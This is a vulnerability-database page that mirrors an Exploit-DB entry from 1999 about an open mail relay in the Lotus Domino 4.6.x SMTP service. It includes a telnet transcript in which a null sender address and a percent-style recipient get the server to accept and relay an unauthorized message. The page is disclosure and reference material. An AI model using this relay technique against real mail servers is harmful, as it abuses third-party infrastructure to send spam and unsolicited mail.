Lucene search
K

Lotus Domino 4.6.1/4.6.4 Notes - SMTPA MTA Mail Relay

🗓️ 15 Jun 1999 00:00:00Reported by Robert ListerType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 21 Views

Lotus Notes SMTP MTA can be exploited as a mail relay for spam through unauthorized access.

Code
source: https://www.securityfocus.com/bid/487/info

Lotus Notes SMTP MTA is susceptible to being used as a mail relay for SPAM or other unsolicited email. Connecting to the mail server (tcp25) and issuing a 'mail from' command with <> as the data may allow an unauthorized user to relay email via this server. 

telnet server 25
Connected to 192.168.1.1.
Escape character is '^]'.
220 company.com Lotus SMTP MTA Service Ready
HELO sample.domain
250 company.com
MAIL FROM:<>
250 OK
RCPT TO:<recipient%[email protected]>
250 OK
DATA
From: ... etc

text of message

.
250 Message received OK.
quit
221 GoodBye 

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

15 Jun 1999 00:00Current
7.4High risk
Vulners AI Score7.4
21